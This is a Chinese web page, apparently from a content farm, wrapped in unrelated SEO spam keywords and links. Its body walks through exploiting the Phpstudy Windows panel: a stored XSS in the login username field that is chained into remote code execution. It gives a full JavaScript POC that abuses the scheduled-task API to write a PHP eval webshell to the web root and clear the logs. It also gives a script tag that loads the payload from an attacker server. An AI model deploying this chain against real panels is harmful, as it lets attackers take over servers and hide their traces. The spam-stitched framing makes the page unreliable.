当前位置: 首页 > news >正文

网站建设电话少儿编程网课国内哪个好

网站建设电话,少儿编程网课国内哪个好,深圳财务小公司网站,新手怎么做电商运营文章目录前言一、漏洞描述二、漏洞复现前言 本篇文章仅用于漏洞复现研究和学习#xff0c;切勿从事非法攻击行为#xff0c;切记#xff01; 一、漏洞描述 Phpstudy小皮面板存在RCE漏洞#xff0c;通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系… 文章目录前言一、漏洞描述二、漏洞复现前言 本篇文章仅用于漏洞复现研究和学习切勿从事非法攻击行为切记 一、漏洞描述 Phpstudy小皮面板存在RCE漏洞通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。 二、漏洞复现 首先去官网下载最新版的小皮Windows面板安装包程序 下载地址https://www.xp.cn/windows-panel.html 本地环境安装 安装完成之后会弹出一个txt文档里面包含访问地址如下所示 访问系统面板出现如下登录界面 首先在用户名登录的地方输入XSS代码验证是否存在漏洞 接着使用正确的账号密码进行登录加载完成之后出现弹窗。 如上图可以看到确实触发XSS弹窗这是因为整个系统在加载的过程中会读取操作日志的内容刚刚在用户名处插入的语句就是为了让系统操作日志进行记录以便登录成功之后加载js代码脚本所以执行显示了登录系统失败。 在当前这个系统界面上有一个计划任务的功能其中可以执行系统命令所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。 操作步骤如下 在本地使用python开启一个http服务并且将poc脚本放在服务目录下进行利用。 POC function poc(){$.get(/service/app/tasks.php?typetask_list,{},function(data){var iddata.data[0].ID;$.post(/service/app/tasks.php?typeexec_task,{tid:id},function(res2){$.post(/service/app/log.php?typeclearlog,{},function(res3){},json);},json);},json); } function save(){var datanew Object();data.task_id;data.titletest;data.exec_cycle1;data.week1;data.day3;data.hour14;data.minute 20;data.shellecho ?php eval($_POST[123]);? D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php;$.post(/service/app/tasks.php?typesave_shell,data,function(res){poc();},json); } save();PS这里需要清空日志避免重复触发。 紧接着在登录处用户名框中插入如下代码 script srchttp://X.X.X.X:8000/poc.js/script操作完成后只要管理员登录到系统插入的XSS代码就可以写入计划任务并执行通过计划任务就可以在服务器上写入文件。 当管理员登录成功后就会在对应路径下产生一个 1.php文件(文件内容自行定义) 因为小皮windows面板这个应用系统类似于宝塔所以其中会部署网站 当文件写入完成后即可通过WebShell管理工具进行连接。
http://www.dnsts.com.cn/news/15297.html

相关文章:

  • 汕头站扩建工程六安 网站建设
  • 网络机房建设方案手机优化专家
  • 免费网站软件制作seo站内优化和站外优化
  • wap手机网站模版西安网站建设淘猫网络
  • wordpress购物网站建设租房子的网站
  • 做网站毕业设计存在的问题服务器可以做自己网站用吗
  • 活动网站建设wordpress做网站怎么样
  • 现在建网站全国网页制作大赛
  • 网站模板 使用百度网盘网址
  • 唯品会官网一家做特卖的网站wordpress主题插件免费下载
  • 佛山网站建设有限公司360极速怎么屏蔽网站
  • 福田外贸网站建设免费logo设计生成器在线制作
  • 如何做闲置物品交换的网站网站开发公司的销售方式
  • 深圳建工是国企还是私企英文seo
  • Apache局域网网站制作长沙网站免费建站
  • 如何自己做电影网站北京建筑设计院排名推荐
  • 兰溪自适应网站建设特点乐平网站
  • 怎么查询网站备案接入商淘宝客网站女装模板下载
  • 聊城做网站推广找谁500个公司取名大全
  • 网站开发 问题 关键技术域名查询 阿里云
  • 模仿淘宝网站域名注册信息查询whois
  • 十大网站app软件下载做ui的网站有哪些
  • dw网站制作南头网站建设
  • 移动网站建设自助建站电脑系统下载官方网站
  • 西安建设网站公司哪家好网站管理员是什么意思
  • 网站建设和后台空间管理关系淄博做域名的公司
  • 东至网站定制上海seo搜索优化
  • 专门学设计的网站wordpress微信文章采集
  • 昆明 做网站 vr海外网站推广的公司
  • wordpress响应式电商做外贸seo优化的公司